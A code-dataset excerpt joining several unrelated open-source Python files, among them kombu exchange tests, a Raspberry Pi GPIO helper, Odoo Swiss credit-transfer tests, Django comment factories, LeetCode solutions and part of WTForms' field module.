('rBaz', None, 'qBaz')]
def test_lookup(self):
self.assertListEqual(
self.e.lookup(self.table, 'eFoo', 'rFoo', None),
['qFoo', 'qFox'],
)
self.assertListEqual(
self.e.lookup(self.table, 'eMoz', 'rMoz', 'DEFAULT'),
[],
)
self.assertListEqual(
self.e.lookup(self.table, 'eBar', 'rBar', None),
['qBar'],
)
class test_Fanout(ExchangeCase):
type = exchange.FanoutExchange
table = [(None, None, 'qFoo'),
(None, None, 'qFox'),
(None, None, 'qBar')]
def test_lookup(self):
self.assertListEqual(
self.e.lookup(self.table, 'eFoo', 'rFoo', None),
['qFoo', 'qFox', 'qBar'],
)
def test_deliver_when_fanout_supported(self):
self.e.channel = Mock()
self.e.channel.supports_fanout = True
message = Mock()
self.e.deliver(message, 'exchange', 'rkey')
self.e.channel._put_fanout.assert_called_with(
'exchange', message, 'rkey',
)
def test_deliver_when_fanout_unsupported(self):
self.e.channel = Mock()
self.e.channel.supports_fanout = False
self.e.deliver(Mock(), 'exchange', None)
self.assertFalse(self.e.channel._put_fanout.called)
class test_Topic(ExchangeCase):
type = exchange.TopicExchange
table = [
('stock.#', None, 'rFoo'),
('stock.us.*', None, 'rBar'),
]
def setUp(self):
super(test_Topic, self).setUp()
self.table = [(rkey, self.e.key_to_pattern(rkey), queue)
for rkey, _, queue in self.table]
def test_prepare_bind(self):
x = self.e.prepare_bind('qFoo', 'eFoo', 'stock.#', {})
self.assertTupleEqual(x, ('stock.#', r'^stock\..*?$', 'qFoo'))
def test_lookup(self):
self.assertListEqual(
self.e.lookup(self.table, 'eFoo', 'stock.us.nasdaq', None),
['rFoo', 'rBar'],
)
self.assertTrue(self.e._compiled)
self.assertListEqual(
self.e.lookup(self.table, 'eFoo', 'stock.europe.OSE', None),
['rFoo'],
)
self.assertListEqual(
self.e.lookup(self.table, 'eFoo', 'stockxeuropexOSE', None),
[],
)
self.assertListEqual(
self.e.lookup(self.table, 'eFoo',
'candy.schleckpulver.snap_crackle', None),
[],
)
def test_deliver(self):
self.e.channel = Mock()
self.e.channel._lookup.return_value = ('a', 'b')
message = Mock()
self.e.deliver(message, 'exchange', 'rkey')
expected = [(('a', message), {}),
(('b', message), {})]
self.assertListEqual(self.e.channel._put.call_args_list, expected)
class test_ExchangeType(ExchangeCase):
type = exchange.ExchangeType
def test_lookup(self):
with self.assertRaises(NotImplementedError):
self.e.lookup([], 'eFoo', 'rFoo', None)
def test_prepare_bind(self):
self.assertTupleEqual(
self.e.prepare_bind('qFoo', 'eFoo', 'rFoo', {}),
('rFoo', None, 'qFoo'),
)
def test_equivalent(self):
e1 = dict(
type='direct',
durable=True,
auto_delete=True,
arguments={},
)
self.assertTrue(
self.e.equivalent(e1, 'eFoo', 'direct', True, True, {}),
)
self.assertFalse(
self.e.equivalent(e1, 'eFoo', 'topic', True, True, {}),
)
self.assertFalse(
self.e.equivalent(e1, 'eFoo', 'direct', False, True, {}),
)
self.assertFalse(
self.e.equivalent(e1, 'eFoo', 'direct', True, False, {}),
)
self.assertFalse(
self.e.equivalent(e1, 'eFoo', 'direct', True, True,
{'expires': 3000}),
)
e2 = dict(e1, arguments={'expires': 3000})
self.assertTrue(
self.e.equivalent(e2, 'eFoo', 'direct', True, True,
{'expires': 3000}),
)
self.assertFalse(
self.e.equivalent(e2, 'eFoo', 'direct', True, True,
{'expires': 6000}),
)
| agpl-3.0 |
Jucker/SIPIntercom-with-FPS | Output.py | 1 | 1795 | #!/usr/bin/env python
#-*- coding: utf-8 -*-
#################################################################
# classes Output #
# Création d'objet de type output pour les GPIO #
# #
# Auteur : Jucker Simon #
# Date : septembre 2015 #
#################################################################
import RPi.GPIO as g
import logging
#logger
logger = logging.getLogger("Output :")
#g.setwarning(False)
class Output:
g.setmode(g.BCM)
def __init__(self, channel, initial_state, name):
"""
Constructeur. Le nom sert pour l'identificatio dans les logs'
"""
self.channel = channel
self.initial_state = initial_state
self.name = name
#Séléction du plan de numérotation des pins
g.setmode(g.BCM)
if initial_state == "low":
g.setup(self.channel, g.OUT, initial=g.LOW)
elif initial_state == "high":
g.setup(self.channel, g.OUT, initial=g.HIGH)
logger.debug(self.name + ": Output créé")
def setHigh(self):
"""
Mise de la sortie à l'état haut
"""
g.output(self.channel, g.HIGH)
logger.debug(self.name + ": High")
def setLow(self):
"""
Mise de la sortie à l'état bas
"""
g.output(self.channel, g.LOW)
logger.debug(self.name + ": Low")
def getState(self):
"""
Retourne l'état actuel de la sortie
True = haut
False = bas
"""
if g.input(self.channel):
return True
else:
return False | gpl-2.0 |
brain-tec/l10n-switzerland | l10n_ch_pain_credit_transfer/tests/test_ch_sct.py | 1 | 15014 | # © 2016 Akretion (Alexis de Lattre <alexis.delattre@akretion.com>)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo.addons.account.tests.account_test_classes\
import AccountingTestCase
from odoo.tools import float_compare
import time
from lxml import etree
import base64
ch_iban = 'CH15 3881 5158 3845 3843 7'
class TestSCTCH(AccountingTestCase):
def setUp(self):
super().setUp()
Account = self.env['account.account']
Journal = self.env['account.journal']
PaymentMode = self.env['account.payment.mode']
self.payment_order_model = self.env['account.payment.order']
self.payment_line_model = self.env['account.payment.line']
self.bank_line_model = self.env['bank.payment.line']
self.partner_bank_model = self.env['res.partner.bank']
self.attachment_model = self.env['ir.attachment']
self.invoice_model = self.env['account.invoice']
self.invoice_line_model = self.env['account.invoice.line']
self.main_company = self.env.ref('base.main_company')
self.partner_agrolait = self.env.ref('base.res_partner_2')
self.account_expense = Account.search([(
'user_type_id',
'=',
self.env.ref('account.data_account_type_expenses').id)], limit=1)
self.account_payable = Account.search([(
'user_type_id',
'=',
self.env.ref('account.data_account_type_payable').id)], limit=1)
# Create a swiss bank
ch_bank1 = self.env['res.bank'].create({
'name': 'Alternative Bank Schweiz AG',
'bic': 'ALSWCH21XXX',
'clearing': '38815',
'ccp': '46-110-7',
})
# create a ch bank account for my company
self.cp_partner_bank = self.partner_bank_model.create({
'acc_number': ch_iban,
'partner_id': self.env.ref('base.main_partner').id,
})
self.cp_partner_bank.onchange_acc_number_set_swiss_bank()
# create journal
self.bank_journal = Journal.create({
'name': 'Company Bank journal',
'type': 'bank',
'code': 'BNKFB',
'bank_account_id': self.cp_partner_bank.id,
'bank_id': ch_bank1.id,
})
# create a payment mode
pay_method_id = self.env.ref(
'account_banking_sepa_credit_transfer.sepa_credit_transfer').id
self.payment_mode = PaymentMode.create({
'name': 'CH credit transfer',
'bank_account_link': 'fixed',
'fixed_journal_id': self.bank_journal.id,
'payment_method_id': pay_method_id,
})
self.payment_mode.payment_method_id.pain_version =\
'pain.001.001.03.ch.02'
self.chf_currency = self.env.ref('base.CHF')
self.eur_currency = self.env.ref('base.EUR')
self.main_company.currency_id = self.chf_currency.id
ch_bank2 = self.env['res.bank'].create({
'name': 'Banque Cantonale Vaudoise',
'bic': 'BCVLCH2LXXX',
'clearing': '767',
'ccp': '01-1234-1',
})
it_bank = self.env['res.bank'].create({
'name': 'Banca Popolare di Bergamo SpA',
'bic': 'BEPOIT21XXX',
})
# Create a bank account with clearing 767
self.agrolait_partner_bank = self.partner_bank_model.create({
'acc_number': 'CH9100767000S00023455',
'partner_id': self.partner_agrolait.id,
'bank_id': ch_bank2.id,
'ccp': '01-1234-1',
})
self.agrolait_partner_bank_sepa = self.partner_bank_model.create({
'acc_number': 'IT60X0542811101000000123456',
'partner_id': self.partner_agrolait.id,
'bank_id': it_bank.id
})
def test_sct_ch_payment_type1(self):
invoice1 = self.create_invoice(
self.partner_agrolait.id,
self.agrolait_partner_bank.id, self.chf_currency, 42.0,
'isr', '132000000000000000000000014')
invoice2 = self.create_invoice(
self.partner_agrolait.id,
self.agrolait_partner_bank.id, self.chf_currency, 12.0,
'isr', '132000000000004')
for inv in [invoice1, invoice2]:
action = inv.create_account_payment_line()
self.assertEquals(action['res_model'], 'account.payment.order')
self.payment_order = self.payment_order_model.browse(action['res_id'])
self.assertEquals(
self.payment_order.payment_type, 'outbound')
self.assertEquals(
self.payment_order.payment_mode_id, self.payment_mode)
self.assertEquals(
self.payment_order.journal_id, self.bank_journal)
pay_lines = self.payment_line_model.search([
('partner_id', '=', self.partner_agrolait.id),
('order_id', '=', self.payment_order.id)])
self.assertEquals(len(pay_lines), 2)
agrolait_pay_line1 = pay_lines[0]
accpre = self.env['decimal.precision'].precision_get('Account')
self.assertEquals(agrolait_pay_line1.currency_id, self.chf_currency)
self.assertEquals(
agrolait_pay_line1.partner_bank_id, invoice1.partner_bank_id)
self.assertEquals(float_compare(
agrolait_pay_line1.amount_currency, 42, precision_digits=accpre),
0)
self.assertEquals(agrolait_pay_line1.communication_type, 'isr')
self.assertEquals(
agrolait_pay_line1.communication,
'132000000000000000000000014')
self.payment_order.draft2open()
self.assertEquals(self.payment_order.state, 'open')
self.assertEquals(self.payment_order.sepa, False)
bank_lines = self.bank_line_model.search([
('partner_id', '=', self.partner_agrolait.id)])
self.assertEquals(len(bank_lines), 2)
for bank_line in bank_lines:
self.assertEquals(bank_line.currency_id, self.chf_currency)
self.assertEquals(bank_line.communication_type, 'isr')
self.assertEquals(
bank_line.communication in [
'132000000000000000000000014',
'132000000000004'], True)
self.assertEquals(
bank_line.partner_bank_id, invoice1.partner_bank_id)
action = self.payment_order.open2generated()
self.assertEquals(self.payment_order.state, 'generated')
self.assertEquals(action['res_model'], 'ir.attachment')
attachment = self.attachment_model.browse(action['res_id'])
self.assertEquals(attachment.datas_fname[-4:], '.xml')
xml_file = base64.b64decode(attachment.datas)
xml_root = etree.fromstring(xml_file)
# print "xml_file=", etree.tostring(xml_root, pretty_print=True)
namespaces = xml_root.nsmap
namespaces['p'] = xml_root.nsmap[None]
namespaces.pop(None)
pay_method_xpath = xml_root.xpath(
'//p:PmtInf/p:PmtMtd', namespaces=namespaces)
self.assertEquals(
namespaces['p'],
'http://www.six-interbank-clearing.com/de/'
'pain.001.001.03.ch.02.xsd')
self.assertEquals(pay_method_xpath[0].text, 'TRF')
sepa_xpath = xml_root.xpath(
'//p:PmtInf/p:PmtTpInf/p:SvcLvl/p:Cd', namespaces=namespaces)
self.assertEquals(len(sepa_xpath), 0)
local_instrument_xpath = xml_root.xpath(
'//p:PmtInf/p:PmtTpInf/p:LclInstrm/p:Prtry', namespaces=namespaces)
self.assertEquals(local_instrument_xpath[0].text, 'CH01')
debtor_acc_xpath = xml_root.xpath(
'//p:PmtInf/p:DbtrAcct/p:Id/p:IBAN', namespaces=namespaces)
self.assertEquals(
debtor_acc_xpath[0].text,
self.payment_order.company_partner_bank_id.sanitized_acc_number)
self.payment_order.generated2uploaded()
self.assertEquals(self.payment_order.state, 'uploaded')
for inv in [invoice1, invoice2]:
self.assertEquals(inv.state, 'paid')
return
def test_sct_ch_payment_type3(self):
invoice1 = self.create_invoice(
self.partner_agrolait.id,
self.agrolait_partner_bank.id, self.eur_currency, 4042.0,
'none', 'Inv1242')
invoice2 = self.create_invoice(
self.partner_agrolait.id,
self.agrolait_partner_bank.id, self.eur_currency, 1012.55,
'none', 'Inv1248')
for inv in [invoice1, invoice2]:
action = inv.create_account_payment_line()
self.assertEquals(action['res_model'], 'account.payment.order')
self.payment_order = self.payment_order_model.browse(action['res_id'])
self.assertEquals(
self.payment_order.payment_type, 'outbound')
self.assertEquals(
self.payment_order.payment_mode_id, self.payment_mode)
self.assertEquals(
self.payment_order.journal_id, self.bank_journal)
pay_lines = self.payment_line_model.search([
('partner_id', '=', self.partner_agrolait.id),
('order_id', '=', self.payment_order.id)])
self.assertEquals(len(pay_lines), 2)
agrolait_pay_line1 = pay_lines[0]
accpre = self.env['decimal.precision'].precision_get('Account')
self.assertEquals(agrolait_pay_line1.currency_id, self.eur_currency)
self.assertEquals(
agrolait_pay_line1.partner_bank_id, invoice1.partner_bank_id)
self.assertEquals(float_compare(
agrolait_pay_line1.amount_currency, 4042.0,
precision_digits=accpre), 0)
self.assertEquals(agrolait_pay_line1.communication_type, 'normal')
self.assertEquals(
agrolait_pay_line1.communication, 'Inv1242')
self.payment_order.draft2open()
self.assertEquals(self.payment_order.state, 'open')
self.assertEquals(self.payment_order.sepa, False)
bank_lines = self.bank_line_model.search([
('partner_id', '=', self.partner_agrolait.id)])
self.assertEquals(len(bank_lines), 1)
bank_line = bank_lines[0]
self.assertEquals(bank_line.currency_id, self.eur_currency)
self.assertEquals(bank_line.communication_type, 'normal')
self.assertEquals(bank_line.communication, 'Inv1242-Inv1248')
self.assertEquals(
bank_line.partner_bank_id, invoice1.partner_bank_id)
action = self.payment_order.open2generated()
self.assertEquals(self.payment_order.state, 'generated')
self.assertEquals(action['res_model'], 'ir.attachment')
attachment = self.attachment_model.browse(action['res_id'])
self.assertEquals(attachment.datas_fname[-4:], '.xml')
xml_file = base64.b64decode(attachment.datas)
xml_root = etree.fromstring(xml_file)
# print "xml_file=", etree.tostring(xml_root, pretty_print=True)
namespaces = xml_root.nsmap
namespaces['p'] = xml_root.nsmap[None]
namespaces.pop(None)
pay_method_xpath = xml_root.xpath(
'//p:PmtInf/p:PmtMtd', namespaces=namespaces)
self.assertEquals(
namespaces['p'],
'http://www.six-interbank-clearing.com/de/'
'pain.001.001.03.ch.02.xsd')
self.assertEquals(pay_method_xpath[0].text, 'TRF')
sepa_xpath = xml_root.xpath(
'//p:PmtInf/p:PmtTpInf/p:SvcLvl/p:Cd', namespaces=namespaces)
self.assertEquals(len(sepa_xpath), 0)
local_instrument_xpath = xml_root.xpath(
'//p:PmtInf/p:PmtTpInf/p:LclInstrm/p:Prtry', namespaces=namespaces)
self.assertEquals(len(local_instrument_xpath), 0)
debtor_acc_xpath = xml_root.xpath(
'//p:PmtInf/p:DbtrAcct/p:Id/p:IBAN', namespaces=namespaces)
self.assertEquals(
debtor_acc_xpath[0].text,
self.payment_order.company_partner_bank_id.sanitized_acc_number)
self.payment_order.generated2uploaded()
self.assertEquals(self.payment_order.state, 'uploaded')
for inv in [invoice1, invoice2]:
self.assertEquals(inv.state, 'paid')
return
def test_sct_ch_payment_type5(self):
invoice1 = self.create_invoice(
self.partner_agrolait.id,
self.agrolait_partner_bank_sepa.id, self.eur_currency, 1234.56,
'none', 'Inv5555')
invoice2 = self.create_invoice(
self.partner_agrolait.id,
self.agrolait_partner_bank_sepa.id, self.eur_currency, 9012.52,
'none', 'Inv6666')
for inv in [invoice1, invoice2]:
action = inv.create_account_payment_line()
self.payment_order = self.payment_order_model.browse(action['res_id'])
self.payment_order.draft2open()
action = self.payment_order.open2generated()
self.assertEquals(self.payment_order.state, 'generated')
attachment = self.attachment_model.browse(action['res_id'])
xml_file = base64.b64decode(attachment.datas)
xml_root = etree.fromstring(xml_file)
namespaces = xml_root.nsmap
namespaces['p'] = xml_root.nsmap[None]
namespaces.pop(None)
sepa_xpath = xml_root.xpath(
'//p:PmtInf/p:PmtTpInf/p:SvcLvl/p:Cd', namespaces=namespaces)
self.assertEquals(len(sepa_xpath), 1)
local_instrument_xpath = xml_root.xpath(
'//p:PmtInf/p:PmtTpInf/p:LclInstrm/p:Prtry', namespaces=namespaces)
self.assertEquals(len(local_instrument_xpath), 0)
debtor_acc_xpath = xml_root.xpath(
'//p:PmtInf/p:DbtrAcct/p:Id/p:IBAN', namespaces=namespaces)
self.assertEquals(
debtor_acc_xpath[0].text,
self.payment_order.company_partner_bank_id.sanitized_acc_number)
self.payment_order.generated2uploaded()
self.assertEquals(self.payment_order.state, 'uploaded')
for inv in [invoice1, invoice2]:
self.assertEquals(inv.state, 'paid')
return
def create_invoice(
self, partner_id, partner_bank_id, currency, price_unit,
ref_type, ref, inv_type='in_invoice'):
invoice = self.invoice_model.create({
'partner_id': partner_id,
'reference_type': ref_type,
'reference': ref,
'currency_id': currency.id,
'name': 'test',
'account_id': self.account_payable.id,
'type': inv_type,
'date_invoice': time.strftime('%Y-%m-%d'),
'payment_mode_id': self.payment_mode.id,
'partner_bank_id': partner_bank_id,
})
self.invoice_line_model.create({
'invoice_id': invoice.id,
'price_unit': price_unit,
'quantity': 1,
'name': 'Great service',
'account_id': self.account_expense.id,
})
invoice.invoice_validate()
invoice.action_move_create()
return invoice
| agpl-3.0 |
django-fluent/django-fluent-comments | example/article/tests/factories.py | 2 | 1430 | from random import random
from article.models import Article
from django.contrib.contenttypes.models import ContentType
from django.contrib.sites.models import Site
from django.utils.timezone import now
from django_comments import get_model as get_comment_model
def create_article(**kwargs):
"""
Create an article, with default parameters
"""
defaults = dict(
title="Testing article",
slug="testing-article" + str(random()),
content="This is testing article",
publication_date=now(),
enable_comments=True,
)
defaults.update(kwargs)
return Article.objects.create(**defaults)
def create_comment(comment_model=None, article=None, user=None, **kwargs):
"""
Create a new comment.
"""
if article is None:
article = create_article()
article_ctype = ContentType.objects.get_for_model(article)
defaults = dict(
user=user,
user_name="Test-Name",
user_email="test@example.com",
user_url="http://example.com",
comment="Test-Comment",
submit_date=now(),
site=Site.objects.get_current(),
ip_address='127.0.0.1',
is_public=True,
is_removed=False,
)
defaults.update(kwargs)
Comment = comment_model or get_comment_model()
return Comment.objects.create(
content_type=article_ctype,
object_pk=article.pk,
**defaults
)
| apache-2.0 |
unitpoint/oxygine-objectscript | tools/others/generate_xml_lines.py | 1 | 1847 | import os
import shutil
import glob
def gen_xml(args):
wildcard = "*.*"
path = args.data + "/" + args.input
filelist = glob.glob(path + "/" + args.wildcard)
dest = open(args.data + "/" + args.out, "w")
write = dest.write
write("<resources>\n")
write("\t<set path=\"%s\"/>\n" % (args.input, ))
write("\t<set scale_factor=\"%s\"/>\n" % (args.sfactor, ))
if not args.load:
write("\t<set load=\"false\"/>\n")
else:
write("\t<set load=\"true\"/>\n")
if not args.atlasses:
write("\t<atlas>\n")
for file in filelist:
name = os.path.split(file)[1]
if args.atlasses:
write("\t<atlas>\n\t")
write("\t<image file='%s' cols=\"1\"/>\n" % (name))
if args.atlasses:
write("\t</atlas>\n")
if not args.atlasses:
write("\t</atlas>\n")
write("</resources>\n")
dest.close()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description = "generates xml file with image resources")
parser.add_argument("-d", "--data", help = "data folder", default = ".", required = True)
parser.add_argument("-s", "--sfactor", help = "scale factor", default = "1")
parser.add_argument("-i", "--input", help = "input folder with images", default = ".", required = True)
parser.add_argument("-o", "--out", help = "new output file", default = "out.xml")
parser.add_argument("-w", "--wildcard", help = "default is '*.png'", default = "*.png")
parser.add_argument("-l", "--load", help = "preload files?", action="store_true")
parser.add_argument("-a", "--atlasses", help = "separate atlasses for each file?", type=bool, default = False)
args = parser.parse_args()
gen_xml(args) | mit |
k3nnyfr/s2a_fr-nsis | s2a/Python/Lib/ctypes/test/test_simplesubclasses.py | 117 | 1355 | import unittest
from ctypes import *
class MyInt(c_int):
def __cmp__(self, other):
if type(other) != MyInt:
return -1
return cmp(self.value, other.value)
def __hash__(self): # Silence Py3k warning
return hash(self.value)
class Test(unittest.TestCase):
def test_compare(self):
self.assertEqual(MyInt(3), MyInt(3))
self.assertNotEqual(MyInt(42), MyInt(43))
def test_ignore_retval(self):
# Test if the return value of a callback is ignored
# if restype is None
proto = CFUNCTYPE(None)
def func():
return (1, "abc", None)
cb = proto(func)
self.assertEqual(None, cb())
def test_int_callback(self):
args = []
def func(arg):
args.append(arg)
return arg
cb = CFUNCTYPE(None, MyInt)(func)
self.assertEqual(None, cb(42))
self.assertEqual(type(args[-1]), MyInt)
cb = CFUNCTYPE(c_int, c_int)(func)
self.assertEqual(42, cb(42))
self.assertEqual(type(args[-1]), int)
def test_int_struct(self):
class X(Structure):
_fields_ = [("x", MyInt)]
self.assertEqual(X().x, MyInt())
s = X()
s.x = MyInt(42)
self.assertEqual(s.x, MyInt(42))
if __name__ == "__main__":
unittest.main()
| gpl-3.0 |
aenon/OnlineJudge | leetcode/5.BitManipulation/462.MinimumMovestoEqualArrayElementsII.py | 1 | 2223 | # 462. Minimum Moves to Equal Array Elements II
# Given a non-empty integer array, find the minimum number of moves required to make all array elements equal, where a move is incrementing a selected element by 1 or decrementing a selected element by 1.
# You may assume the array's length is at most 10,000.
# Example:
# Input:
# [1,2,3]
# Output:
# 2
# Explanation:
# Only two moves are needed (remember each move increments or decrements one element):
# [1,2,3] => [2,2,3] => [2,2,2]
class Solution(object):
def minMoves2(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
#wmd_val = sorted(nums)[len(nums)/2]
from numpy import median
md_val = median(nums)
#return sum(map(lambda x: abs(x - md_val), nums))
return sum(abs(num - md_val) for num in nums)
class Solution2(object):
def minMoves2(self, nums):
"""
:type nums: List[int]
:rtype: int
solution from kamyu
"""
def kthElement(nums, k):
def PartitionAroundPivot(left, right, pivot_idx, nums):
pivot_value = nums[pivot_idx]
new_pivot_idx = left
nums[pivot_idx], nums[right] = nums[right], nums[pivot_idx]
for i in xrange(left, right):
if nums[i] > pivot_value:
nums[i], nums[new_pivot_idx] = nums[new_pivot_idx], nums[i]
new_pivot_idx += 1
nums[right], nums[new_pivot_idx] = nums[new_pivot_idx], nums[right]
return new_pivot_idx
left, right = 0, len(nums) - 1
while left <= right:
pivot_idx = randint(left, right)
new_pivot_idx = PartitionAroundPivot(left, right, pivot_idx, nums)
if new_pivot_idx == k - 1:
return nums[new_pivot_idx]
elif new_pivot_idx > k - 1:
right = new_pivot_idx - 1
else: # new_pivot_idx < k - 1.
left = new_pivot_idx + 1
median = kthElement(nums, len(nums)/2 + 1)
return sum(abs(num - median) for num in nums) | mit |
andrewmoses/ssquiz | flask/lib/python2.7/site-packages/wtforms/fields/core.py | 58 | 33124 | from __future__ import unicode_literals
import datetime
import decimal
import itertools
from wtforms import widgets
from wtforms.compat import text_type, izip
from wtforms.i18n import DummyTranslations
from wtforms.validators import StopValidation
from wtforms.utils import unset_value
__all__ = (
'BooleanField', 'DecimalField', 'DateField', 'DateTimeField', 'FieldList',
'FloatField', 'FormField', 'IntegerField', 'RadioField', 'SelectField',
'SelectMultipleField', 'StringField',
)
class Field(object):
"""
Field base class
"""
errors = tuple()
process_errors = tuple()
raw_data = None
validators = tuple()
widget = None
_formfield = True
_translations = DummyTranslations()
do_not_call_in_templates = True # Allow Django 1.4 traversal
def __new__(cls, *args, **kwargs):
if '_form' in kwargs and '_name' in kwargs:
return super(Field, cls).__new__(cls)
else:
return UnboundField(cls, *args, **kwargs)
def __init__(self, label=None, validators=None, filters=tuple(),
description='', id=None, default=None, widget=None,
_form=None, _name=None, _prefix='', _translations=None,
_meta=None):
"""
Construct a new field.
:param label:
The label of the field.
:param validators:
A sequence of validators to call when `validate` is called.
:param filters:
A sequence of filters which are run on input data by `process`.
:param description:
A description for the field, typically used for help text.
:param id:
An id to use for the field. A reasonable default is set by the form,
and you shouldn't need to set this manually.
:param default:
The default value to assign to the field, if no form or object
input is provided. May be a callable.
:param widget:
If provided, overrides the widget used to render the field.
:param _form:
The form holding this field. It is passed by the form itself during
construction. You should never pass this value yourself.
:param _name:
The name of this field, passed by the enclosing form during its
construction. You should never pass this value yourself.
:param _prefix:
The prefix to prepend to the form name of this field, passed by
the enclosing form during construction.
:param _translations:
A translations object providing message translations. Usually
passed by the enclosing form during construction. See
:doc:`I18n docs <i18n>` for information on message translations.
:param _meta:
If provided, this is the 'meta' instance from the form. You usually
don't pass this yourself.
If `_form` and `_name` isn't provided, an :class:`UnboundField` will be
returned instead. Call its :func:`bind` method with a form instance and
a name to construct the field.
"""
if _translations is not None:
self._translations = _translations
if _meta is not None:
self.meta = _meta
elif _form is not None:
self.meta = _form.meta
else:
raise TypeError("Must provide one of _form or _meta")
self.default = default
self.description = description
self.filters = filters
self.flags = Flags()
self.name = _prefix + _name
self.short_name = _name
self.type = type(self).__name__
self.validators = validators or list(self.validators)
self.id = id or self.name
self.label = Label(self.id, label if label is not None else self.gettext(_name.replace('_', ' ').title()))
if widget is not None:
self.widget = widget
for v in self.validators:
flags = getattr(v, 'field_flags', ())
for f in flags:
setattr(self.flags, f, True)
def __unicode__(self):
"""
Returns a HTML representation of the field. For more powerful rendering,
see the `__call__` method.
"""
return self()
def __str__(self):
"""
Returns a HTML representation of the field. For more powerful rendering,
see the `__call__` method.
"""
return self()
def __html__(self):
"""
Returns a HTML representation of the field. For more powerful rendering,
see the :meth:`__call__` method.
"""
return self()
def __call__(self, **kwargs):
"""
Render this field as HTML, using keyword args as additional attributes.
This delegates rendering to
:meth:`meta.render_field <wtforms.meta.DefaultMeta.render_field>`
whose default behavior is to call the field's widget, passing any
keyword arguments from this call along to the widget.
In all of the WTForms HTML widgets, keyword arguments are turned to
HTML attributes, though in theory a widget is free to do anything it
wants with the supplied keyword arguments, and widgets don't have to
even do anything related to HTML.
"""
return self.meta.render_field(self, kwargs)
def gettext(self, string):
"""
Get a translation for the given message.
This proxies for the internal translations object.
:param string: A unicode string to be translated.
:return: A unicode string which is the translated output.
"""
return self._translations.gettext(string)
def ngettext(self, singular, plural, n):
"""
Get a translation for a message which can be pluralized.
:param str singular: The singular form of the message.
:param str plural: The plural form of the message.
:param int n: The number of elements this message is referring to
"""
return self._translations.ngettext(singular, plural, n)
def validate(self, form, extra_validators=tuple()):
"""
Validates the field and returns True or False. `self.errors` will
contain any errors raised during validation. This is usually only
called by `Form.validate`.
Subfields shouldn't override this, but rather override either
`pre_validate`, `post_validate` or both, depending on needs.
:param form: The form the field belongs to.
:param extra_validators: A sequence of extra validators to run.
"""
self.errors = list(self.process_errors)
stop_validation = False
# Call pre_validate
try:
self.pre_validate(form)
except StopValidation as e:
if e.args and e.args[0]:
self.errors.append(e.args[0])
stop_validation = True
except ValueError as e:
self.errors.append(e.args[0])
# Run validators
if not stop_validation:
chain = itertools.chain(self.validators, extra_validators)
stop_validation = self._run_validation_chain(form, chain)
# Call post_validate
try:
self.post_validate(form, stop_validation)
except ValueError as e:
self.errors.append(e.args[0])
return len(self.errors) == 0
def _run_validation_chain(self, form, validators):
"""
Run a validation chain, stopping if any validator raises StopValidation.
:param form: The Form instance this field beongs to.
:param validators: a sequence or iterable of validator callables.
:return: True if validation was stopped, False otherwise.
"""
for validator in validators:
try:
validator(form, self)
except StopValidation as e:
if e.args and e.args[0]:
self.errors.append(e.args[0])
return True
except ValueError as e:
self.errors.append(e.args[0])
return False
def pre_validate(self, form):
"""
Override if you need field-level validation. Runs before any other
validators.
:param form: The form the field belongs to.
"""
pass
def post_validate(self, form, validation_stopped):
"""
Override if you need to run any field-level validation tasks after
normal validation. This shouldn't be needed in most cases.
:param form: The form the field belongs to.
:param validation_stopped:
`True` if any validator raised StopValidation.
"""
pass
def process(self, formdata, data=unset_value):
"""
Process incoming data, calling process_data, process_formdata as needed,
and run filters.
If `data` is not provided, process_data will be called on the field's
default.
Field subclasses usually won't override this, instead overriding the
process_formdata and process_data methods. Only override this for
special advanced processing, such as when a field encapsulates many
inputs.
"""
self.process_errors = []
if data is unset_value:
try:
data = self.default()
except TypeError:
data = self.default
self.object_data = data
try:
self.process_data(data)
except ValueError as e:
self.process_errors.append(e.args[0])
if formdata:
try:
if self.name in formdata:
self.raw_data = formdata.getlist(self.name)
else:
self.raw_data = []
self.process_formdata(self.raw_data)
except ValueError as e:
self.process_errors.append(e.args[0])
try:
for filter in self.filters:
self.data = filter(self.data)
except ValueError as e:
self.process_errors.append(e.args[0])
def process_data(self, value):
"""
Process the Python data applied to this field and store the result.
This will be called during form construction by the form's `kwargs` or
`obj` argument.
:param value: The python object containing the value to process.
"""
self.data = value
def process_formdata(self, valuelist):
"""
Process data received over the wire from a form.
This will be called during form construction with data supplied
through the `formdata` argument.
:param valuelist: A list of strings to process.
"""
if valuelist:
self.data = valuelist[0]
def populate_obj(self, obj, name):
"""
Populates `obj.<name>` with the field's data.
:note: This is a destructive operation. If `obj.<name>` already exists,
it will be overridden. Use with caution.
"""
setattr(obj, name, self.data)
class UnboundField(object):
_formfield = True
creation_counter = 0
def __init__(self, field_class, *args, **kwargs):
UnboundField.creation_counter += 1
self.field_class = field_class
self.args = args
self.kwargs = kwargs
self.creation_counter = UnboundField.creation_counter
def bind(self, form, name, prefix='', translations=None, **kwargs):
kw = dict(
self.kwargs,
_form=form,
_prefix=prefix,
_name=name,
_translations=translations,
**kwargs
)
return self.field_class(*self.args, **kw)
def __repr__(self):
return '<UnboundField(%s, %r, %r)>' % (self.field_class.__name__, self.args, self.kwargs)
class Flags(object):
"""
Holds a set of boolean flags as attributes.
Accessing a non-existing attribute returns False for its value.
"""
def __getattr__(self, name):
if name.startswith('_'):
return super(Flags, self).__getattr__(name)
return False
def __contains__(self, name):
return getattr(self, name)
def __repr__(self):
flags = (name for name in dir(self) if not name.startswith('_'))
return '<wtforms.fields.Flags: {%s}>' % ', '.join(flags)
class Label(object):
"""
An HTML form label.
"""
def __init__(self, field_id, text):
self.field_id = field_id
self.text = text
def __str__(self):
return self()
def __unicode__(self):
return self()
def __html__(self):
return self()
def __call__(self, text=None, **kwargs):
if 'for_' in kwargs:
kwargs['for'] = kwargs.pop('for_')
else:
kwargs.setdefault('for', self.field_id)
attributes = widgets.html_params(**kwargs)
return widgets.HTMLString('<label %s>%s</label>' % (attributes, text or self.text))
def __repr__(self):
return 'Label(%r, %r)' % (self.field_id, self.text)
class SelectFieldBase(Field):
option_widget = widgets.Option()
"""
Base class for fields which can be iterated to produce options.
This isn't a field, but an abstract base class for fields which want to
provide this functionality.
"""
def __init__(self, label=None, validators=None, option_widget=None, **kwargs):
super(SelectFieldBase, self).__init__(label, validators, **kwargs)
if option_widget is not None:
self.option_widget = option_widget
def iter_choices(self):
"""
Provides data for choice widget rendering. Must return a sequence or
iterable of (value, label, selected) tuples.
"""
raise NotImplementedError()
def __iter__(self):
opts = dict(widget=self.option_widget, _name=self.name, _form=None, _meta=self.meta)
for i, (value, label, checked) in enumerate(self.iter_choices()):
